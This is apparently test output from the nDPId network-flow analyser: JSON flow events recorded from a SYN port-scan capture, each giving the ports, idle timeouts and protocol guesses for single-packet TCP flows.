-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
